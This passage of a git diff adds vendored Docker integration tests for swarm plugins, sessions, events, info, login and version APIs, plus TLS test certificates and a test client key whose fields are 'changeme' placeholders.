swarm.ServicePoll) + poll.WaitOn(t, d2.PluginIsRunning(name), swarm.ServicePoll) + poll.WaitOn(t, d3.PluginIsNotPresent(name), swarm.ServicePoll) + + d1.RemoveService(t, id) + poll.WaitOn(t, d1.PluginIsNotPresent(name), swarm.ServicePoll) + poll.WaitOn(t, d2.PluginIsNotPresent(name), swarm.ServicePoll) + poll.WaitOn(t, d3.PluginIsNotPresent(name), swarm.ServicePoll) + + // with no name + id = d1.CreateService(t, makePlugin(repo, "", nil)) + poll.WaitOn(t, d1.PluginIsRunning(repo), swarm.ServicePoll) + poll.WaitOn(t, d2.PluginIsRunning(repo), swarm.ServicePoll) + poll.WaitOn(t, d3.PluginIsRunning(repo), swarm.ServicePoll) + + d1.RemoveService(t, id) + poll.WaitOn(t, d1.PluginIsNotPresent(repo), swarm.ServicePoll) + poll.WaitOn(t, d2.PluginIsNotPresent(repo), swarm.ServicePoll) + poll.WaitOn(t, d3.PluginIsNotPresent(repo), swarm.ServicePoll) +} + +func makePlugin(repo, name string, constraints []string) func(*swarmtypes.Service) { + return func(s *swarmtypes.Service) { + s.Spec.TaskTemplate.Runtime = "plugin" + s.Spec.TaskTemplate.PluginSpec = &runtime.PluginSpec{ + Name: name, + Remote: repo, + } + if constraints != nil { + s.Spec.TaskTemplate.Placement = &swarmtypes.Placement{ + Constraints: constraints, + } + } + } +} diff --git a/vendor/github.com/docker/docker/integration/session/main_test.go b/vendor/github.com/docker/docker/integration/session/main_test.go new file mode 100644 index 0000000000..fc33025efe --- /dev/null +++ b/vendor/github.com/docker/docker/integration/session/main_test.go @@ -0,0 +1,33 @@ +package session // import "github.com/docker/docker/integration/session" + +import ( + "fmt" + "os" + "testing" + + "github.com/docker/docker/internal/test/environment" +) + +var testEnv *environment.Execution + +func TestMain(m *testing.M) { + var err error + testEnv, err = environment.New() + if err != nil { + fmt.Println(err) + os.Exit(1) + } + err = environment.EnsureFrozenImagesLinux(testEnv) + if err != nil { + fmt.Println(err) + os.Exit(1) + } + + 
testEnv.Print() + os.Exit(m.Run()) +} + +func setupTest(t *testing.T) func() { + environment.ProtectAll(t, testEnv) + return func() { testEnv.Clean(t) } +} diff --git a/vendor/github.com/docker/docker/integration/session/session_test.go b/vendor/github.com/docker/docker/integration/session/session_test.go new file mode 100644 index 0000000000..67a3773abd --- /dev/null +++ b/vendor/github.com/docker/docker/integration/session/session_test.go @@ -0,0 +1,48 @@ +package session // import "github.com/docker/docker/integration/session" + +import ( + "net/http" + "testing" + + req "github.com/docker/docker/internal/test/request" + "gotest.tools/assert" + is "gotest.tools/assert/cmp" + "gotest.tools/skip" +) + +func TestSessionCreate(t *testing.T) { + skip.If(t, !testEnv.DaemonInfo.ExperimentalBuild) + + defer setupTest(t)() + + res, body, err := req.Post("/session", req.With(func(r *http.Request) error { + r.Header.Set("X-Docker-Expose-Session-Uuid", "testsessioncreate") // so we don't block default name if something else is using it + r.Header.Set("Upgrade", "h2c") + return nil + })) + assert.NilError(t, err) + assert.NilError(t, body.Close()) + assert.Check(t, is.DeepEqual(res.StatusCode, http.StatusSwitchingProtocols)) + assert.Check(t, is.Equal(res.Header.Get("Upgrade"), "h2c")) +} + +func TestSessionCreateWithBadUpgrade(t *testing.T) { + skip.If(t, !testEnv.DaemonInfo.ExperimentalBuild) + + res, body, err := req.Post("/session") + assert.NilError(t, err) + assert.Check(t, is.DeepEqual(res.StatusCode, http.StatusBadRequest)) + buf, err := req.ReadBody(body) + assert.NilError(t, err) + assert.Check(t, is.Contains(string(buf), "no upgrade")) + + res, body, err = req.Post("/session", req.With(func(r *http.Request) error { + r.Header.Set("Upgrade", "foo") + return nil + })) + assert.NilError(t, err) + assert.Check(t, is.DeepEqual(res.StatusCode, http.StatusBadRequest)) + buf, err = req.ReadBody(body) + assert.NilError(t, err) + assert.Check(t, is.Contains(string(buf), 
"not supported")) +} diff --git a/vendor/github.com/docker/docker/integration/system/cgroupdriver_systemd_test.go b/vendor/github.com/docker/docker/integration/system/cgroupdriver_systemd_test.go new file mode 100644 index 0000000000..449c83fdab --- /dev/null +++ b/vendor/github.com/docker/docker/integration/system/cgroupdriver_systemd_test.go @@ -0,0 +1,56 @@ +package system + +import ( + "context" + "os" + "testing" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/integration/internal/container" + "github.com/docker/docker/internal/test/daemon" + + "gotest.tools/assert" +) + +// hasSystemd checks whether the host was booted with systemd as its init +// system. Stolen from +// https://github.com/coreos/go-systemd/blob/176f85496f4e/util/util.go#L68 +func hasSystemd() bool { + fi, err := os.Lstat("/run/systemd/system") + if err != nil { + return false + } + return fi.IsDir() +} + +// TestCgroupDriverSystemdMemoryLimit checks that container +// memory limit can be set when using systemd cgroupdriver. 
+// https://github.com/moby/moby/issues/35123 +func TestCgroupDriverSystemdMemoryLimit(t *testing.T) { + t.Parallel() + + if !hasSystemd() { + t.Skip("systemd not available") + } + + d := daemon.New(t) + client, err := d.NewClient() + assert.NilError(t, err) + d.StartWithBusybox(t, "--exec-opt", "native.cgroupdriver=systemd", "--iptables=false") + defer d.Stop(t) + + const mem = 64 * 1024 * 1024 // 64 MB + + ctx := context.Background() + ctrID := container.Create(t, ctx, client, func(c *container.TestContainerConfig) { + c.HostConfig.Resources.Memory = mem + }) + defer client.ContainerRemove(ctx, ctrID, types.ContainerRemoveOptions{Force: true}) + + err = client.ContainerStart(ctx, ctrID, types.ContainerStartOptions{}) + assert.NilError(t, err) + + s, err := client.ContainerInspect(ctx, ctrID) + assert.NilError(t, err) + assert.Equal(t, s.HostConfig.Memory, mem) +} diff --git a/vendor/github.com/docker/docker/integration/system/event_test.go b/vendor/github.com/docker/docker/integration/system/event_test.go new file mode 100644 index 0000000000..6e86f4ad95 --- /dev/null +++ b/vendor/github.com/docker/docker/integration/system/event_test.go @@ -0,0 +1,122 @@ +package system // import "github.com/docker/docker/integration/system" + +import ( + "context" + "encoding/json" + "io" + "net/http" + "net/url" + "strconv" + "testing" + "time" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/filters" + "github.com/docker/docker/api/types/strslice" + "github.com/docker/docker/api/types/versions" + "github.com/docker/docker/integration/internal/container" + "github.com/docker/docker/internal/test/request" + req "github.com/docker/docker/internal/test/request" + "github.com/docker/docker/pkg/jsonmessage" + "gotest.tools/assert" + is "gotest.tools/assert/cmp" + "gotest.tools/skip" +) + +func TestEventsExecDie(t *testing.T) { + skip.If(t, versions.LessThan(testEnv.DaemonAPIVersion(), "1.36"), "broken in earlier versions") + defer setupTest(t)() + ctx 
:= context.Background() + client := request.NewAPIClient(t) + + cID := container.Run(t, ctx, client) + + id, err := client.ContainerExecCreate(ctx, cID, + types.ExecConfig{ + Cmd: strslice.StrSlice([]string{"echo", "hello"}), + }, + ) + assert.NilError(t, err) + + filters := filters.NewArgs( + filters.Arg("container", cID), + filters.Arg("event", "exec_die"), + ) + msg, errors := client.Events(ctx, types.EventsOptions{ + Filters: filters, + }) + + err = client.ContainerExecStart(ctx, id.ID, + types.ExecStartCheck{ + Detach: true, + Tty: false, + }, + ) + assert.NilError(t, err) + + select { + case m := <-msg: + assert.Equal(t, m.Type, "container") + assert.Equal(t, m.Actor.ID, cID) + assert.Equal(t, m.Action, "exec_die") + assert.Equal(t, m.Actor.Attributes["execID"], id.ID) + assert.Equal(t, m.Actor.Attributes["exitCode"], "0") + case err = <-errors: + t.Fatal(err) + case <-time.After(time.Second * 3): + t.Fatal("timeout hit") + } + +} + +// Test case for #18888: Events messages have been switched from generic +// `JSONMessage` to `events.Message` types. The switch does not break the +// backward compatibility so old `JSONMessage` could still be used. +// This test verifies that backward compatibility maintains. +func TestEventsBackwardsCompatible(t *testing.T) { + defer setupTest(t)() + ctx := context.Background() + client := request.NewAPIClient(t) + + since := request.DaemonTime(ctx, t, client, testEnv) + ts := strconv.FormatInt(since.Unix(), 10) + + cID := container.Create(t, ctx, client) + + // In case there is no events, the API should have responded immediately (not blocking), + // The test here makes sure the response time is less than 3 sec. 
+ expectedTime := time.Now().Add(3 * time.Second) + emptyResp, emptyBody, err := req.Get("/events") + assert.NilError(t, err) + defer emptyBody.Close() + assert.Check(t, is.DeepEqual(http.StatusOK, emptyResp.StatusCode)) + assert.Check(t, time.Now().Before(expectedTime), "timeout waiting for events api to respond, should have responded immediately") + + // We also test to make sure the `events.Message` is compatible with `JSONMessage` + q := url.Values{} + q.Set("since", ts) + _, body, err := req.Get("/events?" + q.Encode()) + assert.NilError(t, err) + defer body.Close() + + dec := json.NewDecoder(body) + var containerCreateEvent *jsonmessage.JSONMessage + for { + var event jsonmessage.JSONMessage + if err := dec.Decode(&event); err != nil { + if err == io.EOF { + break + } + t.Fatal(err) + } + if event.Status == "create" && event.ID == cID { + containerCreateEvent = &event + break + } + } + + assert.Check(t, containerCreateEvent != nil) + assert.Check(t, is.Equal("create", containerCreateEvent.Status)) + assert.Check(t, is.Equal(cID, containerCreateEvent.ID)) + assert.Check(t, is.Equal("busybox", containerCreateEvent.From)) +} diff --git a/vendor/github.com/docker/docker/integration/system/info_linux_test.go b/vendor/github.com/docker/docker/integration/system/info_linux_test.go new file mode 100644 index 0000000000..50fa9874b4 --- /dev/null +++ b/vendor/github.com/docker/docker/integration/system/info_linux_test.go @@ -0,0 +1,48 @@ +// +build !windows + +package system // import "github.com/docker/docker/integration/system" + +import ( + "context" + "net/http" + "testing" + + "github.com/docker/docker/internal/test/request" + req "github.com/docker/docker/internal/test/request" + "gotest.tools/assert" + is "gotest.tools/assert/cmp" +) + +func TestInfoBinaryCommits(t *testing.T) { + client := request.NewAPIClient(t) + + info, err := client.Info(context.Background()) + assert.NilError(t, err) + + assert.Check(t, "N/A" != info.ContainerdCommit.ID) + assert.Check(t, 
is.Equal(testEnv.DaemonInfo.ContainerdCommit.Expected, info.ContainerdCommit.Expected)) + assert.Check(t, is.Equal(info.ContainerdCommit.Expected, info.ContainerdCommit.ID)) + + assert.Check(t, "N/A" != info.InitCommit.ID) + assert.Check(t, is.Equal(testEnv.DaemonInfo.InitCommit.Expected, info.InitCommit.Expected)) + assert.Check(t, is.Equal(info.InitCommit.Expected, info.InitCommit.ID)) + + assert.Check(t, "N/A" != info.RuncCommit.ID) + assert.Check(t, is.Equal(testEnv.DaemonInfo.RuncCommit.Expected, info.RuncCommit.Expected)) + assert.Check(t, is.Equal(info.RuncCommit.Expected, info.RuncCommit.ID)) +} + +func TestInfoAPIVersioned(t *testing.T) { + // Windows only supports 1.25 or later + + res, body, err := req.Get("/v1.20/info") + assert.NilError(t, err) + assert.Check(t, is.DeepEqual(res.StatusCode, http.StatusOK)) + + b, err := req.ReadBody(body) + assert.NilError(t, err) + + out := string(b) + assert.Check(t, is.Contains(out, "ExecutionDriver")) + assert.Check(t, is.Contains(out, "not supported")) +} diff --git a/vendor/github.com/docker/docker/integration/system/info_test.go b/vendor/github.com/docker/docker/integration/system/info_test.go new file mode 100644 index 0000000000..2a05dfbb74 --- /dev/null +++ b/vendor/github.com/docker/docker/integration/system/info_test.go @@ -0,0 +1,42 @@ +package system // import "github.com/docker/docker/integration/system" + +import ( + "context" + "fmt" + "testing" + + "github.com/docker/docker/internal/test/request" + "gotest.tools/assert" + is "gotest.tools/assert/cmp" +) + +func TestInfoAPI(t *testing.T) { + client := request.NewAPIClient(t) + + info, err := client.Info(context.Background()) + assert.NilError(t, err) + + // always shown fields + stringsToCheck := []string{ + "ID", + "Containers", + "ContainersRunning", + "ContainersPaused", + "ContainersStopped", + "Images", + "LoggingDriver", + "OperatingSystem", + "NCPU", + "OSType", + "Architecture", + "MemTotal", + "KernelVersion", + "Driver", + "ServerVersion", + 
"SecurityOptions"} + + out := fmt.Sprintf("%+v", info) + for _, linePrefix := range stringsToCheck { + assert.Check(t, is.Contains(out, linePrefix)) + } +} diff --git a/vendor/github.com/docker/docker/integration/system/login_test.go b/vendor/github.com/docker/docker/integration/system/login_test.go new file mode 100644 index 0000000000..ad1a8756dc --- /dev/null +++ b/vendor/github.com/docker/docker/integration/system/login_test.go @@ -0,0 +1,28 @@ +package system // import "github.com/docker/docker/integration/system" + +import ( + "context" + "testing" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/integration/internal/requirement" + "github.com/docker/docker/internal/test/request" + "gotest.tools/assert" + is "gotest.tools/assert/cmp" + "gotest.tools/skip" +) + +// Test case for GitHub 22244 +func TestLoginFailsWithBadCredentials(t *testing.T) { + skip.If(t, !requirement.HasHubConnectivity(t)) + + client := request.NewAPIClient(t) + + config := types.AuthConfig{ + Username: "no-user", + Password: "no-password", + } + _, err := client.RegistryLogin(context.Background(), config) + expected := "Error response from daemon: Get https://registry-1.docker.io/v2/: unauthorized: incorrect username or password" + assert.Check(t, is.Error(err, expected)) +} diff --git a/vendor/github.com/docker/docker/integration/system/main_test.go b/vendor/github.com/docker/docker/integration/system/main_test.go new file mode 100644 index 0000000000..f19a3157aa --- /dev/null +++ b/vendor/github.com/docker/docker/integration/system/main_test.go @@ -0,0 +1,33 @@ +package system // import "github.com/docker/docker/integration/system" + +import ( + "fmt" + "os" + "testing" + + "github.com/docker/docker/internal/test/environment" +) + +var testEnv *environment.Execution + +func TestMain(m *testing.M) { + var err error + testEnv, err = environment.New() + if err != nil { + fmt.Println(err) + os.Exit(1) + } + err = environment.EnsureFrozenImagesLinux(testEnv) + if err != 
nil { + fmt.Println(err) + os.Exit(1) + } + + testEnv.Print() + os.Exit(m.Run()) +} + +func setupTest(t *testing.T) func() { + environment.ProtectAll(t, testEnv) + return func() { testEnv.Clean(t) } +} diff --git a/vendor/github.com/docker/docker/integration/system/version_test.go b/vendor/github.com/docker/docker/integration/system/version_test.go new file mode 100644 index 0000000000..8904c09b26 --- /dev/null +++ b/vendor/github.com/docker/docker/integration/system/version_test.go @@ -0,0 +1,23 @@ +package system // import "github.com/docker/docker/integration/system" + +import ( + "context" + "testing" + + "github.com/docker/docker/internal/test/request" + "gotest.tools/assert" + is "gotest.tools/assert/cmp" +) + +func TestVersion(t *testing.T) { + client := request.NewAPIClient(t) + + version, err := client.ServerVersion(context.Background()) + assert.NilError(t, err) + + assert.Check(t, version.APIVersion != "") + assert.Check(t, version.Version != "") + assert.Check(t, version.MinAPIVersion != "") + assert.Check(t, is.Equal(testEnv.DaemonInfo.ExperimentalBuild, version.Experimental)) + assert.Check(t, is.Equal(testEnv.OSType, version.Os)) +} diff --git a/vendor/github.com/docker/docker/integration/testdata/https/ca.pem b/vendor/github.com/docker/docker/integration/testdata/https/ca.pem new file mode 100644 index 0000000000..6825d6d1bd --- /dev/null +++ b/vendor/github.com/docker/docker/integration/testdata/https/ca.pem @@ -0,0 +1,23 @@ +-----BEGIN CERTIFICATE----- +MIID0TCCAzqgAwIBAgIJAP2r7GqEJwSnMA0GCSqGSIb3DQEBBQUAMIGiMQswCQYD +VQQGEwJVUzELMAkGA1UECBMCQ0ExFTATBgNVBAcTDFNhbkZyYW5jaXNjbzEVMBMG +A1UEChMMRm9ydC1GdW5zdG9uMREwDwYDVQQLEwhjaGFuZ2VtZTERMA8GA1UEAxMI +Y2hhbmdlbWUxETAPBgNVBCkTCGNoYW5nZW1lMR8wHQYJKoZIhvcNAQkBFhBtYWls +QGhvc3QuZG9tYWluMB4XDTEzMTIwMzE2NTYzMFoXDTIzMTIwMTE2NTYzMFowgaIx +CzAJBgNVBAYTAlVTMQswCQYDVQQIEwJDQTEVMBMGA1UEBxMMU2FuRnJhbmNpc2Nv +MRUwEwYDVQQKEwxGb3J0LUZ1bnN0b24xETAPBgNVBAsTCGNoYW5nZW1lMREwDwYD 
+VQQDEwhjaGFuZ2VtZTERMA8GA1UEKRMIY2hhbmdlbWUxHzAdBgkqhkiG9w0BCQEW +EG1haWxAaG9zdC5kb21haW4wgZ8wDQYJKoZIhvcNAQEBBQADgY0AMIGJAoGBALAn +0xDw+5y7ZptQacq66pUhRu82JP2WU6IDgo5QUtNU6/CX5PwQATe/OnYTZQFbksxp +AU9boG0FCkgxfsgPYXEuZxVEGKI2fxfKHOZZI8mrkWmj6eWU/0cvCjGVc9rTITP5 +sNQvg+hORyVDdNp2IdsbMJayiB3AQYMFx3vSDOMTAgMBAAGjggELMIIBBzAdBgNV +HQ4EFgQUZu7DFz09q0QBa2+ymRm9qgK1NPswgdcGA1UdIwSBzzCBzIAUZu7DFz09 +q0QBa2+ymRm9qgK1NPuhgaikgaUwgaIxCzAJBgNVBAYTAlVTMQswCQYDVQQIEwJD +QTEVMBMGA1UEBxMMU2FuRnJhbmNpc2NvMRUwEwYDVQQKEwxGb3J0LUZ1bnN0b24x +ETAPBgNVBAsTCGNoYW5nZW1lMREwDwYDVQQDEwhjaGFuZ2VtZTERMA8GA1UEKRMI +Y2hhbmdlbWUxHzAdBgkqhkiG9w0BCQEWEG1haWxAaG9zdC5kb21haW6CCQD9q+xq +hCcEpzAMBgNVHRMEBTADAQH/MA0GCSqGSIb3DQEBBQUAA4GBAF8fJKKM+/oOdnNi +zEd0M1+PmZOyqvjYQn/2ZR8UHH6Imgc/OPQKZXf0bVE1Txc/DaUNn9Isd1SuCuaE +ic3vAIYYU7PmgeNN6vwec48V96T7jr+GAi6AVMhQEc2hHCfVtx11Xx+x6aHDZzJt +Zxtf5lL6KSO9Y+EFwM+rju6hm5hW +-----END CERTIFICATE----- diff --git a/vendor/github.com/docker/docker/integration/testdata/https/client-cert.pem b/vendor/github.com/docker/docker/integration/testdata/https/client-cert.pem new file mode 100644 index 0000000000..c05ed47c2c --- /dev/null +++ b/vendor/github.com/docker/docker/integration/testdata/https/client-cert.pem @@ -0,0 +1,73 @@ +Certificate: + Data: + Version: 3 (0x2) + Serial Number: 3 (0x3) + Signature Algorithm: sha1WithRSAEncryption + Issuer: C=US, ST=CA, L=SanFrancisco, O=Fort-Funston, OU=changeme, CN=changeme/name=changeme/emailAddress=mail@host.domain + Validity + Not Before: Dec 4 14:17:54 2013 GMT + Not After : Dec 2 14:17:54 2023 GMT + Subject: C=US, ST=CA, L=SanFrancisco, O=Fort-Funston, OU=changeme, CN=client/name=changeme/emailAddress=mail@host.domain + Subject Public Key Info: + Public Key Algorithm: rsaEncryption + Public-Key: (1024 bit) + Modulus: + 00:ca:c9:05:d0:09:4e:3e:a4:fc:d5:14:f4:a5:e8: + 34:d3:6b:51:e3:f3:62:ea:a1:f0:e8:ed:c4:2a:bc: + f0:4f:ca:07:df:e3:88:fa:f4:21:99:35:0e:3d:ea: + b0:86:e7:c4:d2:8a:83:2b:42:b8:ec:a3:99:62:70: + 
81:46:cc:fc:a5:1d:d2:63:e8:eb:07:25:9a:e2:25: + 6d:11:56:f2:1a:51:a1:b6:3e:1c:57:32:e9:7b:2c: + aa:1b:cc:97:2d:89:2d:b1:c9:5e:35:28:4d:7c:fa: + 65:31:3e:f7:70:dd:6e:0b:3c:58:af:a8:2e:24:c0: + 7e:4e:78:7d:0a:9e:8f:42:43 + Exponent: 65537 (0x10001) + X509v3 extensions: + X509v3 Basic Constraints: + CA:FALSE + Netscape Comment: + Easy-RSA Generated Certificate + X509v3 Subject Key Identifier: + DE:42:EF:2D:98:A3:6C:A8:AA:E0:8C:71:2C:9D:64:23:A9:E2:7E:81 + X509v3 Authority Key Identifier: + keyid:66:EE:C3:17:3D:3D:AB:44:01:6B:6F:B2:99:19:BD:AA:02:B5:34:FB + DirName:/C=US/ST=CA/L=SanFrancisco/O=Fort-Funston/OU=changeme/CN=changeme/name=changeme/emailAddress=mail@host.domain + serial:FD:AB:EC:6A:84:27:04:A7 + + X509v3 Extended Key Usage: + TLS Web Client Authentication + X509v3 Key Usage: + Digital Signature + Signature Algorithm: sha1WithRSAEncryption + 1c:44:26:ea:e1:66:25:cb:e4:8e:57:1c:f6:b9:17:22:62:40: + 12:90:8f:3b:b2:61:7a:54:94:8f:b1:20:0b:bf:a3:51:e3:fa: + 1c:a1:be:92:3a:d0:76:44:c0:57:83:ab:6a:e4:1a:45:49:a4: + af:39:0d:60:32:fc:3a:be:d7:fb:5d:99:7a:1f:87:e7:d5:ab: + 84:a2:5e:90:d8:bf:fa:89:6d:32:26:02:5e:31:35:68:7f:31: + f5:6b:51:46:bc:af:70:ed:5a:09:7d:ec:b2:48:4f:fe:c5:2f: + 56:04:ad:f6:c1:d2:2a:e4:6a:c4:87:fe:08:35:c5:38:cb:5e: + 4a:c4 +-----BEGIN CERTIFICATE----- +MIIEFTCCA36gAwIBAgIBAzANBgkqhkiG9w0BAQUFADCBojELMAkGA1UEBhMCVVMx +CzAJBgNVBAgTAkNBMRUwEwYDVQQHEwxTYW5GcmFuY2lzY28xFTATBgNVBAoTDEZv +cnQtRnVuc3RvbjERMA8GA1UECxMIY2hhbmdlbWUxETAPBgNVBAMTCGNoYW5nZW1l +MREwDwYDVQQpEwhjaGFuZ2VtZTEfMB0GCSqGSIb3DQEJARYQbWFpbEBob3N0LmRv +bWFpbjAeFw0xMzEyMDQxNDE3NTRaFw0yMzEyMDIxNDE3NTRaMIGgMQswCQYDVQQG +EwJVUzELMAkGA1UECBMCQ0ExFTATBgNVBAcTDFNhbkZyYW5jaXNjbzEVMBMGA1UE +ChMMRm9ydC1GdW5zdG9uMREwDwYDVQQLEwhjaGFuZ2VtZTEPMA0GA1UEAxMGY2xp +ZW50MREwDwYDVQQpEwhjaGFuZ2VtZTEfMB0GCSqGSIb3DQEJARYQbWFpbEBob3N0 +LmRvbWFpbjCBnzANBgkqhkiG9w0BAQEFAAOBjQAwgYkCgYEAyskF0AlOPqT81RT0 +peg002tR4/Ni6qHw6O3EKrzwT8oH3+OI+vQhmTUOPeqwhufE0oqDK0K47KOZYnCB 
+Rsz8pR3SY+jrByWa4iVtEVbyGlGhtj4cVzLpeyyqG8yXLYktscleNShNfPplMT73 +cN1uCzxYr6guJMB+Tnh9Cp6PQkMCAwEAAaOCAVkwggFVMAkGA1UdEwQCMAAwLQYJ +YIZIAYb4QgENBCAWHkVhc3ktUlNBIEdlbmVyYXRlZCBDZXJ0aWZpY2F0ZTAdBgNV +HQ4EFgQU3kLvLZijbKiq4IxxLJ1kI6nifoEwgdcGA1UdIwSBzzCBzIAUZu7DFz09 +q0QBa2+ymRm9qgK1NPuhgaikgaUwgaIxCzAJBgNVBAYTAlVTMQswCQYDVQQIEwJD +QTEVMBMGA1UEBxMMU2FuRnJhbmNpc2NvMRUwEwYDVQQKEwxGb3J0LUZ1bnN0b24x +ETAPBgNVBAsTCGNoYW5nZW1lMREwDwYDVQQDEwhjaGFuZ2VtZTERMA8GA1UEKRMI +Y2hhbmdlbWUxHzAdBgkqhkiG9w0BCQEWEG1haWxAaG9zdC5kb21haW6CCQD9q+xq +hCcEpzATBgNVHSUEDDAKBggrBgEFBQcDAjALBgNVHQ8EBAMCB4AwDQYJKoZIhvcN +AQEFBQADgYEAHEQm6uFmJcvkjlcc9rkXImJAEpCPO7JhelSUj7EgC7+jUeP6HKG+ +kjrQdkTAV4OrauQaRUmkrzkNYDL8Or7X+12Zeh+H59WrhKJekNi/+oltMiYCXjE1 +aH8x9WtRRryvcO1aCX3sskhP/sUvVgSt9sHSKuRqxIf+CDXFOMteSsQ= +-----END CERTIFICATE----- diff --git a/vendor/github.com/docker/docker/integration/testdata/https/client-key.pem b/vendor/github.com/docker/docker/integration/testdata/https/client-key.pem new file mode 100644 index 0000000000..b5c15f8dc7 --- /dev/null +++ b/vendor/github.com/docker/docker/integration/testdata/https/client-key.pem @@ -0,0 +1,16 @@ +-----BEGIN PRIVATE KEY----- +MIICdQIBADANBgkqhkiG9w0BAQEFAASCAl8wggJbAgEAAoGBAMrJBdAJTj6k/NUU +9KXoNNNrUePzYuqh8OjtxCq88E/KB9/jiPr0IZk1Dj3qsIbnxNKKgytCuOyjmWJw +gUbM/KUd0mPo6wclmuIlbRFW8hpRobY+HFcy6XssqhvMly2JLbHJXjUoTXz6ZTE+ +93Ddbgs8WK+oLiTAfk54fQqej0JDAgMBAAECgYBOFEzKp2qbMEexe9ofL2N3rDDh +xkrl8OijpzkLA6i78BxMFn4dsnZlWUpciMrjhsYAExkiRRSS+QMMJimAq1jzQqc3 +FAQV2XGYwkd0cUn7iZGvfNnEPysjsfyYQM+m+sT0ATj4BZjVShC6kkSjTdm1leLN +OSvcHdcu3Xxg9ufF0QJBAPYdnNt5sIndt2WECePuRVi+uF4mlxTobFY0fjn26yhC +4RsnhhD3Vldygo9gvnkwrAZYaALGSPBewes2InxvjA8CQQDS7erKiNXpwoqz5XiU +SVEsIIVTdWzBjGbIqMOu/hUwM5FK4j6JTBks0aTGMyh0YV9L1EzM0X79J29JahCe +iQKNAkBKNMOGqTpBV0hko1sYDk96YobUXG5RL4L6uvkUIQ7mJMQam+AgXXL7Ctuy +v0iu4a38e8tgisiTMP7nHHtpaXihAkAOiN54/lzfMsykANgCP9scE1GcoqbP34Dl +qttxH4kOPT9xzY1JoLjLYdbc4YGUI3GRpBt2sajygNkmUey7P+2xAkBBsVCZFvTw 
+qHvOpPS2kX5ml5xoc/QAHK9N7kR+X7XFYx82RTVSqJEK4lPb+aEWn+CjiIewO4Q5 +ksDFuNxAzbhl +-----END PRIVATE KEY----- diff --git a/vendor/github.com/docker/docker/integration/testdata/https/server-cert.pem b/vendor/github.com/docker/docker/integration/testdata/https/server-cert.pem new file mode 100644 index 0000000000..08abfd1a3b --- /dev/null +++ b/vendor/github.com/docker/docker/integration/testdata/https/server-cert.pem @@ -0,0 +1,76 @@ +Certificate: + Data: + Version: 3 (0x2) + Serial Number: 4 (0x4) + Signature Algorithm: sha1WithRSAEncryption + Issuer: C=US, ST=CA, L=SanFrancisco, O=Fort-Funston, OU=changeme, CN=changeme/name=changeme/emailAddress=mail@host.domain + Validity + Not Before: Dec 4 15:01:20 2013 GMT + Not After : Dec 2 15:01:20 2023 GMT + Subject: C=US, ST=CA, L=SanFrancisco, O=Fort-Funston, OU=changeme, CN=*/name=changeme/emailAddress=mail@host.domain + Subject Public Key Info: + Public Key Algorithm: rsaEncryption + Public-Key: (1024 bit) + Modulus: + 00:c1:ff:7d:30:6f:64:4a:b1:92:b1:71:d1:c1:74: + e2:1d:db:2d:11:24:e1:00:d4:00:ae:6f:c8:9e:ae: + 67:b3:4a:bd:f7:e6:9e:57:6d:19:4c:3c:23:94:2d: + 3d:d6:63:84:d8:fa:76:2b:38:12:c1:ed:20:9d:32: + e0:e8:c2:bf:9a:77:70:04:3f:7f:ca:8c:2c:82:d6: + 3d:25:5c:02:1a:4f:64:93:03:dd:9c:42:97:5e:09: + 49:af:f0:c2:e1:30:08:0e:21:46:95:d1:13:59:c0: + c8:76:be:94:0d:8b:43:67:21:33:b2:08:60:9d:76: + a8:05:32:1e:f9:95:09:14:75 + Exponent: 65537 (0x10001) + X509v3 extensions: + X509v3 Basic Constraints: + CA:FALSE + Netscape Cert Type: + SSL Server + Netscape Comment: + Easy-RSA Generated Server Certificate + X509v3 Subject Key Identifier: + 14:02:FD:FD:DD:13:38:E0:71:EA:D1:BE:C0:0E:89:1A:2D:B6:19:06 + X509v3 Authority Key Identifier: + keyid:66:EE:C3:17:3D:3D:AB:44:01:6B:6F:B2:99:19:BD:AA:02:B5:34:FB + DirName:/C=US/ST=CA/L=SanFrancisco/O=Fort-Funston/OU=changeme/CN=changeme/name=changeme/emailAddress=mail@host.domain + serial:FD:AB:EC:6A:84:27:04:A7 + + X509v3 Extended Key Usage: + TLS Web Server Authentication + X509v3 Key 
Usage: + Digital Signature, Key Encipherment + Signature Algorithm: sha1WithRSAEncryption + 40:0f:10:39:c4:b7:0f:0d:2f:bf:d2:16:cc:8e:d3:9a:fb:8b: + ce:4b:7b:0d:48:77:ce:f1:fe:d5:8f:ea:b1:71:ed:49:1d:9f: + 23:3a:16:d4:70:7c:c5:29:bf:e4:90:34:d0:f0:00:24:f4:e4: + df:2c:c3:83:01:66:61:c9:a8:ab:29:e7:98:6d:27:89:4a:76: + c9:2e:19:8e:fe:6e:d5:f8:99:11:0e:97:67:4b:34:e3:1e:e3: + 9f:35:00:a5:32:f9:b5:2c:f2:e0:c5:2e:cc:81:bd:18:dd:5c: + 12:c8:6b:fa:0c:17:74:30:55:f6:6e:20:9a:6c:1e:09:b4:0c: + 15:42 +-----BEGIN CERTIFICATE----- +MIIEKjCCA5OgAwIBAgIBBDANBgkqhkiG9w0BAQUFADCBojELMAkGA1UEBhMCVVMx +CzAJBgNVBAgTAkNBMRUwEwYDVQQHEwxTYW5GcmFuY2lzY28xFTATBgNVBAoTDEZv +cnQtRnVuc3RvbjERMA8GA1UECxMIY2hhbmdlbWUxETAPBgNVBAMTCGNoYW5nZW1l +MREwDwYDVQQpEwhjaGFuZ2VtZTEfMB0GCSqGSIb3DQEJARYQbWFpbEBob3N0LmRv +bWFpbjAeFw0xMzEyMDQxNTAxMjBaFw0yMzEyMDIxNTAxMjBaMIGbMQswCQYDVQQG +EwJVUzELMAkGA1UECBMCQ0ExFTATBgNVBAcTDFNhbkZyYW5jaXNjbzEVMBMGA1UE +ChMMRm9ydC1GdW5zdG9uMREwDwYDVQQLEwhjaGFuZ2VtZTEKMAgGA1UEAxQBKjER +MA8GA1UEKRMIY2hhbmdlbWUxHzAdBgkqhkiG9w0BCQEWEG1haWxAaG9zdC5kb21h +aW4wgZ8wDQYJKoZIhvcNAQEBBQADgY0AMIGJAoGBAMH/fTBvZEqxkrFx0cF04h3b +LREk4QDUAK5vyJ6uZ7NKvffmnldtGUw8I5QtPdZjhNj6dis4EsHtIJ0y4OjCv5p3 +cAQ/f8qMLILWPSVcAhpPZJMD3ZxCl14JSa/wwuEwCA4hRpXRE1nAyHa+lA2LQ2ch +M7IIYJ12qAUyHvmVCRR1AgMBAAGjggFzMIIBbzAJBgNVHRMEAjAAMBEGCWCGSAGG 